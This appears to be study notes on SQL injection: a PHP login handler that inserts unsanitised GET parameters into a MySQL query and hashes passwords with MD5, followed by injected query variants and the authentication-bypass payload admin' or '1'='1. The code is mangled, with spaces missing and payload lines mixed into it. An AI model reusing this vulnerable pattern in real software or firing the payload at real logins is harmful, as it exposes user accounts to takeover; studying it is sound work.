SQL

if(isset($_GET['Login'])){
//Getusername
$user=$_GET['username'];

                    //Getpassword
                    $pass=$_GET['password'];
                    $pass=md5($pass);

                    //Checkthedatabase
                    $query="SELECT * FROM `users` WHEREuser='$user' AND password='$pass';";

                    "SELECT * FROM `users` WHERE user='$admin' or '1'='1' AND password='$pass';";
                    "SELECT * FROM `users` WHERE user='$user' or '1'='1' AND password='$pass';";

                    admin' or '1'='1
                    
                    $result=mysql_query($query)ordie('
'.mysql_error().'
');

                    if($result&&mysql_num_rows($result)==1){
                                            //Getusersdetails
                                            $avatar=mysql_result($result,0,"avatar");

                                            //Loginsuccessful
                                            echo"
Welcome to the password protected area{$user}
";
                                            echo"";
                                                        }
                    else{
                                            //Loginfailed
                                            echo"

Username and /or  password incorrect.
";
                        }

                    mysql_close();

}